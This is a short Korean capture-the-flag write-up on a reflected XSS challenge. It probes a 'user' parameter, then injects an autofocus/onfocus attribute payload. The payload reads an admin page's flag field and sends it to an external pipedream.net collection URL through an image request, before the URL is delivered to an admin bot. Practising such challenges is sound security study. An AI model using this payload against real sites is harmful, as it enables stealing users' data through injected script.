[CTF] Basic Script Prac

📌
XSS (Cross Site Scripting)
Client Script 활용

---

관리자 계정으로 들어가면 Flag Here...! 칸에 플래그가 있을 것이다.
스크립트 삽입해서 탈취해보자.

우선 스크립트 삽입을 어디서 할 수 있을지 살펴보자.
user 값을 보내고 있으니 user를 조작해보자.
특수문자 삽입 가능여부 확인 위해 test<'"> 입력

꺽쇠 삽입 가능하며 우리가 탈취해야하는 정보의 input name="info" 까지 확인.

꺽쇠 삽입이 가능하지만 input태그를 탈출하지 않고 해보려함.

먼저 alert(1) 을 출력해보자.
user값 뒤에

스크립트가 잘 작동하는 것을 확인했으니 탈취코드를 써보자.

" autofocus 
onfocus= "javascript: var flag =document.getElementsByName('info')[0].placeholder; 
<!--name='info'가 지정된 첫번째 요소의 placeholder의 값을 불러옴. -->
var i =new Image();i.src=`https://en2hyoic3j7mi.x.pipedream.net/?flag=${flag}`

Flag Here..! 이 잘넘어오고 있다.
관리자 봇에게 URL을 보내면 관리자 마이페이지에 있는 플래그를 탈취할 수 있을 것이다.

관리자 정보 탈취 완료!